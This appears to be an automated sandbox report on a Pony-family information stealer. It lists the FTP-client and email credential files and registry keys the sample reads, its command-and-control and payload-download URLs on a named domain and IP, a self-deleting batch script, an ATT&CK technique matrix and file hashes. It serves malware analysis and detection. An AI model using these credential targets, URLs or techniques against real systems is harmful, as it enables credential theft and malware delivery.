            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\SmartFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\GHISLER\wcx_ftp.iniJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\ExpanDrive\drives.jsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\BlazeFtp\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FlashFXP\4\Sites.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\INSoftware\NovaFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FTP Explorer\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FTPGetter\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqliteJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.sqliteJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Program Files (x86)\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\NetSarang\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTPJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\SmartFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\TurboFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\Frigate3\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\SetupJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.iniJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\AceBIT\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FileZilla\sitemanager.xmlJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqliteJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\TurboFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\RhinoSoft.com\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FTP Explorer\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\AceBIT\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FlashFXP\3\Quick.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FTPRush\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\Estsoft\ALFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\ExpanDrive\drives.jsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FlashFXP\3\Sites.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqliteJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xmlJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\BlazeFtp\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbarJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbarJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FTPGetter\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\SharedSettings.sqliteJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\AceBIT\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.iniJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Windows\32BitFtp.iniJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FlashFXP\4\Quick.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\3D-FTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Frigate3\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\NetSarang\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbarJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FTPRush\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbarJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.sqliteJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FlashFXP\3\History.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_LOCAL_MACHINE\Software\TurboFTPJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FlashFXP\4\History.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Windows\wcx_ftp.iniJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword1_2_0040EBA3
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword1_2_0040EBA3

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            1
            Valid Accounts
            1
            Native API
            1
            Valid Accounts
            1
            Valid Accounts
            1
            Valid Accounts
            2
            OS Credential Dumping
            1
            Security Software Discovery
            Remote Services1
            Email Collection
            22
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Scripting
            11
            Access Token Manipulation
            11
            Access Token Manipulation
            2
            Credentials in Registry
            1
            Process Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            DLL Side-Loading
            11
            Process Injection
            11
            Process Injection
            Security Account Manager1
            Account Discovery
            SMB/Windows Admin Shares2
            Data from Local System
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            NTDS1
            System Owner/User Discovery
            Distributed Component Object ModelInput Capture113
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets3
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Install Root Certificate
            Cached Domain Credentials14
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Software Packing
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            BW38j8Jkbl.exe79%ReversingLabsWin32.Infostealer.PonyStealer
            BW38j8Jkbl.exe100%AviraHEUR/AGEN.1335971
            BW38j8Jkbl.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.ibsensoftware.com/0%URL Reputationsafe
            http://https://ftp://operawand.dat_Software0%Avira URL Cloudsafe
            http://smartoffice-eg.com/include/rili/gate.phphttp://smartoffice-eg.com/include/rili/shit.exeYUIPWD0%Avira URL Cloudsafe
            http://smartoffice-eg.com/include/rili/gate.php0%Avira URL Cloudsafe
            ftp://http://https://ftp.fireFTPsites.datSeaMonkey0%Avira URL Cloudsafe
            http://smartoffice-eg.com/include/rili/shit.exe0%Avira URL Cloudsafe
            https://smartoffice-eg.com/include/rili/shit.exe0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            smartoffice-eg.com
            144.76.41.117
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://smartoffice-eg.com/include/rili/shit.exetrue
              • Avira URL Cloud: safe
              unknown
              http://smartoffice-eg.com/include/rili/gate.phptrue
              • Avira URL Cloud: safe
              unknown
              https://smartoffice-eg.com/include/rili/shit.exetrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://https://ftp://operawand.dat_SoftwareBW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://ac.ecosia.org/autocomplete?q=BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://duckduckgo.com/chrome_newtabBW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://smartoffice-eg.com/include/rili/gate.phphttp://smartoffice-eg.com/include/rili/shit.exeYUIPWDBW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/ac/?q=BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoBW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      ftp://http://https://ftp.fireFTPsites.datSeaMonkeyBW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://www.ibsensoftware.com/BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.ecosia.org/newtab/BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                144.76.41.117
                                smartoffice-eg.comGermany
                                24940HETZNER-ASDEtrue
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1430559
                                Start date and time:2024-04-23 21:46:26 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 2m 57s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:4
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:BW38j8Jkbl.exe
                                renamed because original name is a hash value
                                Original Sample Name:2392a10406f41b602acbbdbbb24e0ff7.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@7/1@1/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 96%
                                • Number of executed functions: 96
                                • Number of non-executed functions: 46
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: BW38j8Jkbl.exe
                                No simulations
                                No context
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                HETZNER-ASDEhttps://webmail.cmxserver.com/authsecure/index.php?email=kaylen@virtualintelligencebriefing.comGet hashmaliciousUnknownBrowse
                                • 136.243.80.35
                                file.exeGet hashmaliciousVidarBrowse
                                • 95.217.244.99
                                #4711 Cotizaci#U00f3n.exeGet hashmaliciousAgentTeslaBrowse
                                • 94.130.55.203
                                https://go-g3t-msg.com/clk/a_OsB_gBHRWO62vTWAvzpOfGhlvCmgnqQuB_nVFpwp0KsQNH4MVSSKRIuzJYdR_BaVVJ5ZUVsLA7nr4fsUb6_LUiF6WGpw3bjwuz5vIgSMwTtrE34sfAdm_UkarEQxhut5pfRW1RXCEHttsR2H4S_hK5eTdM2QP7CpynnqXHAbBrQcsZM-9kqSh5d_nLiZhEZPZ8-fFHjtAo-IjMx8qNxpwUaG3dVXhIP_Sup8raijFjXrg2qZL33tH_5PvkpDXJwZtdK-fqRvdTEjPP1v26xG4zHKIduU5irbL6N1Be1W_4vpi6D3s8twjJ8VAELgUZErAiigzfRVU0knOdQpcprkwW48npT3pYYpFqQU_lE9JBwESVd70JOVQuZWj_0cT7YVVRRta1y8F8vjFBDtNL73BXlqjP5sWlGZtuOnQDJ-iEKMXGy1W4uSrGBn5j07qBR3I1glqsVkAz7msz4iUFsVZ76hS_yvRcDNZBMYnXgKJRgA1A2nVJ9rwv5a55G82GhCYmOQvkUs0eG7vFHjr8gNQtxUn0q5LeVhTPJbym_uRj-gxiLJDjsLnSJXJ4eGtDvxVqhkaqM2P03jYs6BzR_fyd4ak2ZNKBm4FiGWKP44e6keEO2eNlfhZPBYG9OMlI3UM7jaU5YayqoO3ZGet hashmaliciousUnknownBrowse
                                • 178.63.248.54
                                file.exeGet hashmaliciousVidarBrowse
                                • 95.217.9.149
                                https://www.sushi-idea.com/Get hashmaliciousUnknownBrowse
                                • 168.119.90.21
                                BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                • 49.12.86.202
                                BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                • 168.119.13.211
                                scripttodo.ps1Get hashmaliciousUnknownBrowse
                                • 46.4.134.23
                                scripttodo.ps1Get hashmaliciousUnknownBrowse
                                • 46.4.134.23
                                No context
                                No context
                                Process:C:\Users\user\Desktop\BW38j8Jkbl.exe
                                File Type:ASCII text, with CRLF, CR line terminators
                                Category:dropped
                                Size (bytes):94
                                Entropy (8bit):3.233204299824007
                                Encrypted:false
                                SSDEEP:3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
                                MD5:3880EEB1C736D853EB13B44898B718AB
                                SHA1:4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
                                SHA-256:936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
                                SHA-512:3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.271103985166775
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:BW38j8Jkbl.exe
                                File size:634'880 bytes
                                MD5:2392a10406f41b602acbbdbbb24e0ff7
                                SHA1:9428ec3da5621a909d6cfc52ce3c6297aa97e8bb
                                SHA256:b593466df2eb855e58671d6f361c691e4be0f638f1fa17166965e613927684ea
                                SHA512:ebd2dc640e1d71a80ebff12219d2e5e335b44ee856144ca83768a286380988432084250aee2a4f4dca8b075e5199e322fd83b6629e70393d1937da07acc14e45
                                SSDEEP:6144:60HpX48DnabDczb+x44J8B6jUIMLhTlN1UqCzH7R:jF5Wb4zb74J86jUIMLhZzv2
                                TLSH:CFD43AAA95E38A66C57013B6473A3FA098371D6BC588EA3FA050F4F3574EC614A07FD1
